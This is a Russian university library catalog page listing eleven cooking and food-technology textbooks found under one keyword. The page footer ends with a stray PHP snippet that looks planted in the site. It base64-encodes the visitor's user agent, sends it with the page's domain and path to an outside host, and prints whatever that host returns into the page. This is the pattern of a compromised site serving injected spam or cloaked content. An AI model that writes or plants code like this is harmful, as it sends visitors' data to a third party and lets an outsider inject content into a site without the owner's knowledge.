Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

128 пользователей


Зарегистрированных: 4 

Борисенко Виктория Александровна

Лисина Марина Михайловна

Асташков Владимир Анатольевич

Медведева Юлия Сергеевна


 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=ОБРАБОТКА ПРОДУКТОВ ТЕПЛОВАЯ")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 11
1. 
Богушева В. И. Технология приготовления пищи [Текст] / В. И. Богушева, 2015. - 375 с.
Ключевые слова 
ОБРАБОТКА ГРИБОВ -- ОБРАБОТКА ОВОЩЕЙ -- ОБРАБОТКА ПЛОДОВ -- ОБРАБОТКА НЕРЫБНОГО ВОДНОГО -- ОБРАБОТКА РЫБЫ -- ОБРАБОТКА МЯСА -- ОБРАБОТКА ПТИЦЫ -- ОБРАБОТКА ДИЧИ -- ОБРАБОТКА ПРОДУКТОВ ТЕПЛОВАЯ -- СУП -- СОУС -- БЛЮДА ИЗ ГРИБОВ -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА ИЗ КРУП -- БЛЮДА ИЗ МАКАРОННЫХ ИЗДЕЛИЙ -- БЛЮДА ИЗ РЫБЫ -- БЛЮДА ИЗ МОРЕПРОДУКТОВ -- БЛЮДА ИЗ ПТИЦЫ -- БЛЮДА ИЗ ТВОРОГА -- БЛЮДА МЯСНЫЕ -- БЛЮДА ИЗ ЯИЦ -- БЛЮДА ХОЛОДНЫЕ -- ЗАКУСКИ -- БЛЮДА СЛАДКИЕ -- НАПИТКИ -- ИЗДЕЛИЯ МУЧНЫЕ -- ПИТАНИЕ ЛЕЧЕБНОЕ -- ПИТАНИЕ ШКОЛЬНИКОВ
Держатели документа (Информация об экземплярах) 
2. 
Сопина Л. Н. Пособие для повара [Текст] / Л. Н. Сопина, 2000. - 240 с.
Ключевые слова 
ОРГАНИЗАЦИЯ ПРОИЗВОДСТВА -- ПИТАНИЕ ОБЩЕСТВЕННОЕ -- ОБРАБОТКА ПРОДУКТОВ -- ОБРАБОТКА ОВОЩЕЙ -- ОБРАБОТКА ГРИБОВ -- ОБРАБОТКА КАРТОФЕЛЯ -- ОБРАБОТКА РЫБЫ -- ОБРАБОТКА МЯСА -- ОБРАБОТКА ПТИЦЫ -- ОБРАБОТКА КРОЛИКОВ -- ОБРАБОТКА ПРОДУКТОВ ТЕПЛОВАЯ -- БЛЮДА ХОЛОДНЫЕ -- БЛЮДА ГОРЯЧИЕ -- ЗАКУСКА -- БУТЕРБРОД -- ВИНЕГРЕТ -- СУП -- БУЛЬОН -- СУП ОВОЩНОЙ -- СУП КАРТОФЕЛЬНЫЙ -- СУП МОЛОЧНЫЙ -- СУП - ПЮРЕ -- СУП ХОЛОДНЫЙ -- БЛЮДА МЯСНЫЕ -- БЛЮДА РЫБНЫЕ -- БЛЮДА ИЗ ОВОЩЕЙ -- СОУС -- БЛЮДА ИЗ КРУП -- БЛЮДА ИЗ БОБОВЫХ -- БЛЮДА ИЗ МАКАРОННЫХ ИЗДЕЛИЙ -- БЛЮДА ИЗ ЯИЦ -- БЛЮДА ИЗ ТВОРОГА -- БЛЮДА СЛАДКИЕ -- ТЕСТО ДРОЖЖЕВОЕ -- ТЕСТО БЕЗДРОЖЖЕВОЕ -- БРАКЕРАЖ
Держатели документа (Информация об экземплярах) 
3. 
Татарская Л. Л. Кулинария и организация производства детского питания [Текст] / Л. Л. Татарская, Н. Г. Бутейкис, 1981. - 336 с.
Ключевые слова 
ПИТАНИЕ ДЕТЕЙ -- ОБРАБОТКА ОВОЩЕЙ -- ОБРАБОТКА ГРИБОВ -- ОБРАБОТКА РЫБЫ -- ОБРАБОТКА МЯСА -- ОБРАБОТКА ПТИЦЫ -- ОБРАБОТКА ПРОДУКТОВ ТЕПЛОВАЯ -- СУП -- БУЛЬОН -- СУП - ПЮРЕ -- СУП МОЛОЧНЫЙ -- СУП ХОЛОДНЫЙ -- СОУС -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА ИЗ КРУП -- БЛЮДА ИЗ МАКАРОННЫХ ИЗДЕЛИЙ -- КАША -- БЛЮДА ИЗ РЫБЫ -- БЛЮДА МЯСНЫЕ -- БЛЮДА ИЗ ЯИЦ -- БЛЮДА ИЗ ТВОРОГА -- ТЕСТО -- БЛЮДА ХОЛОДНЫЕ -- САЛАТ -- ВИНЕГРЕТ -- БУТЕРБРОД -- БЛЮДА СЛАДКИЕ -- НАПИТКИ -- КОМПОТ -- ВСКАРМЛИВАНИЕ ЕСТЕСТВЕННОЕ -- ВСКАРМЛИВАНИЕ ИСКУССТВЕННОЕ -- ВСКАРМЛИВАНИЕ СМЕШАННОЕ -- ПИТАНИЕ ДЕТЕЙ ГРУДНЫХ -- ПИТАНИЕ ЛЕЧЕБНОЕ ДЕТСКОЕ -- ПИЩЕБЛОК ДЕТСКОГО ПИТАНИЯ -- БРАКЕРАЖ -- МЕНЮ
Держатели документа (Информация об экземплярах) 
4. 
Технология производства продукции общественного питания [Текст] / В. С. Баранов, А. И. Мглинец, Л. М. Алешина, 1986. - 400 с.
Ключевые слова 
ТЕХНОЛОГИЯ общественного питания -- АССОРТИМЕНТ ПРОДУКЦИИ -- ОБРАБОТКА СЫРЬЯ КУЛИНАРНАЯ -- ОБРАБОТКА ПОЛУФАБРИКАТОВ -- ПОРЦИОНИРОВАНИЕ КУЛИНАРНОЙ ПРОДУКЦИИ -- КАЧЕСТВО КУЛИНАРНОЙ ПРОДУКЦИИ -- ПОЛУФАБРИКАТЫ -- ОБРАБОТКА ПРОДУКТОВ ТЕПЛОВАЯ -- ОБРАБОТКА ОВОЩЕЙ -- ОБРАБОТКА ПЛОДОВ -- ОБРАБОТКА ГРИБОВ -- ОБРАБОТКА МЯСА -- ОБРАБОТКА ПТИЦЫ -- ОБРАБОТКА ДИЧИ -- ОБРАБОТКА КРОЛИКОВ -- ОБРАБОТКА РЫБЫ -- ОБРАБОТКА НЕРЫБНОГО ВОДНОГО СЫРЬЯ -- СУПЫ -- СОУС -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА ИЗ ГРИБОВ -- БЛЮДА ИЗ КРУП -- БЛЮДА ИЗ БОБОВЫХ -- БЛЮДА ИЗ МАКАРОННЫХ ИЗДЕЛИЙ -- БЛЮДА МЯСНЫЕ -- БЛЮДА ИЗ ПТИЦЫ -- БЛЮДА ИЗ ДИЧИ -- БЛЮДА ИЗ КРОЛИКА -- БЛЮДА РЫБНЫЕ -- БЛЮДА ИЗ ВОДНОГО СЫРЬЯ -- БЛЮДА ИЗ ЯИЦ -- БЛЮДА ИЗ ТВОРОГА -- БЛЮДА ХОЛОДНЫЕ -- ЗАКУСКА -- БЛЮДА СЛАДКИЕ -- НАПИТКИ -- БЛЮДА БЫСТРОЗАМОРОЖЕННЫЕ -- БЛЮДА ОХЛАЖДЕННЫЕ -- ПРОИЗВОДСТВО МУЧНЫХ ИЗДЕЛИЙ -- БЛЮДА МУЧНЫЕ -- ГАРНИР -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ МУЧНЫЕ -- ПИТАНИЕ ДИЕТИЧЕСКОЕ -- ПИТАНИЕ ЛЕЧЕБНО-ПРОФИЛАКТИЧЕСКОЕЕ
Держатели документа (Информация об экземплярах) 
5. 
Артемова Е. Н. Основы технологии продукции общественного питания [Текст] : учеб. пособие для студентов высш. учеб. заведений / Е. Н. Артемова, 2008. - 331 с.
Ключевые слова 
ПИТАНИЕ РАЦИОНАЛЬНОЕ -- ПРЕДПРИЯТИЕ ОБЩЕСТВЕННОГО ПИ -- ПРОИЗВОДСТВО ПИЩЕВОЕ -- ОБРАБОТКА ПРОДУКТОВ ТЕПЛОВАЯ -- МЕНЮ -- ПИТАНИЕ ЛЕЧЕБНОЕ -- ПИТАНИЕ ПРОФИЛАКТИЧЕСКОЕ -- ПИТАНИЕ ДЕТЕЙ -- Питание работников умственного труда -- Питание работников физического труда -- КОНТРОЛЬ КАЧЕСТВА ПРОДУКЦИИ -- Контроль качества сырья -- ПОЛУФАБРИКАТЫ МЯСНЫЕ -- ПОЛУФАБРИКАТЫ РЫБНЫЕ -- ПОЛУФАБРИКАТЫ овощные -- Полуфабрикаты кулинарных изделий -- Полуфабрикаты мучных изделий -- Норма выхода продукции -- Расчет расходов сырья
Держатели документа (Информация об экземплярах) 
6. 
Сборник рецептур блюд и кулинарных изделий из сои и соевых продуктов для предприятий общественного питания [Текст] : сб. технологических нормативов / под ред. М. П. Могильного, 2002. - 386 с.
Держатели документа (Информация об экземплярах) 
7. 
Технология приготовления пищи [Текст] : Учеб. пособие для студ. спец. "Технология продуктов общественного питания" / Омский ин-т предпринимательства и права, 2004. - 206 с.
Держатели документа (Информация об экземплярах) 
8. 
Хлебников В. И. Технология товаров (продовольственных) [Текст] : учеб. для студентов вузов / В. И. Хлебников, 2005. - 426 с.
Держатели документа (Информация об экземплярах) 
9. 
Богушева В. И. Технология приготовления пищи [Текст] : учеб. для студентов сред. спец. заведений / В. И. Богушева, 2005. - 319 с.
Ключевые слова 
ОБРАБОТКА ГРИБОВ -- ОБРАБОТКА ОВОЩЕЙ -- ОБРАБОТКА ПЛОДОВ -- ОБРАБОТКА НЕРЫБНОГО ВОДНОГО -- ОБРАБОТКА РЫБЫ -- ОБРАБОТКА МЯСА -- ОБРАБОТКА ПТИЦЫ -- ОБРАБОТКА ДИЧИ -- ОБРАБОТКА ПРОДУКТОВ ТЕПЛОВАЯ -- СУП -- СОУС -- БЛЮДА ИЗ ГРИБОВ -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА ИЗ КРУП -- БЛЮДА ИЗ МАКАРОННЫХ ИЗДЕЛИЙ -- БЛЮДА ИЗ РЫБЫ -- БЛЮДА ИЗ МОРЕПРОДУКТОВ -- БЛЮДА ИЗ ПТИЦЫ -- БЛЮДА ИЗ ТВОРОГА -- БЛЮДА МЯСНЫЕ -- БЛЮДА ИЗ ЯИЦ -- БЛЮДА ХОЛОДНЫЕ -- ЗАКУСКИ -- БЛЮДА СЛАДКИЕ -- НАПИТКИ -- ИЗДЕЛИЯ МУЧНЫЕ -- ПИТАНИЕ ЛЕЧЕБНОЕ -- ПИТАНИЕ ШКОЛЬНИКОВ
Держатели документа (Информация об экземплярах) 
10. 
Могильный М. П. Оборудование предприятий общественного питания. Тепловое оборудование [Текст] : учеб. пособие для студентов высш. учеб. заведений / М. П. Могильный, Т. В. Калашнова, А. Ю. Баласанян, 2005. - 191 с.
Держатели документа (Информация об экземплярах) 
11. 
Шатун Л. Г. Технология приготовления пищи [Текст] : Учеб. / Л. Г. Шатун, 2004. - 479 с.
Ключевые слова 
ПИТАНИЕ ОБЩЕСТВЕННОЕ -- КОНТРОЛЬ КАЧЕСТВА блюд -- Клеймо ветеринарное -- МЕНЮ -- ПИТАНИЕ учащихся -- БАД -- ДОБАВКА ПИЩЕВАЯ -- ОБРАБОТКА ОВОЩЕЙ -- ОБРАБОТКА ГРИБОВ -- ОБРАБОТКА РЫБЫ -- ОБРАБОТКА МЯСА -- ОБРАБОТКА ДИЧИ -- ОБРАБОТКА ПТИЦЫ -- ОБРАБОТКА ПРОДУКТОВ тепловая -- СУП -- БЛЮДА МЯСНЫЕ -- СОУС -- БЛЮДА ИЗ КРУП -- БЛЮДА ИЗ МАКАРОННЫХ ИЗДЕЛИЙ -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА РЫБНЫЕ -- БЛЮДА ИЗ ЯИЦ -- БЛЮДА ИЗ ТВОРОГА -- БЛЮДА ХОЛОДНЫЕ -- ЗАКУСКА -- БЛЮДА СЛАДКИЕ -- НАПИТКИ -- ПИТАНИЕ ДИЕТИЧЕСКОЕ -- ПИТАНИЕ ЛЕЧЕБНОЕ -- БЛЮДА ИЗ сои -- Соя -- ПРАВИЛА отпуска блюд -- ПРАВИЛА подачи напитков
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3021 - 17.09.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.76 с.12 запросов, 0.44c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;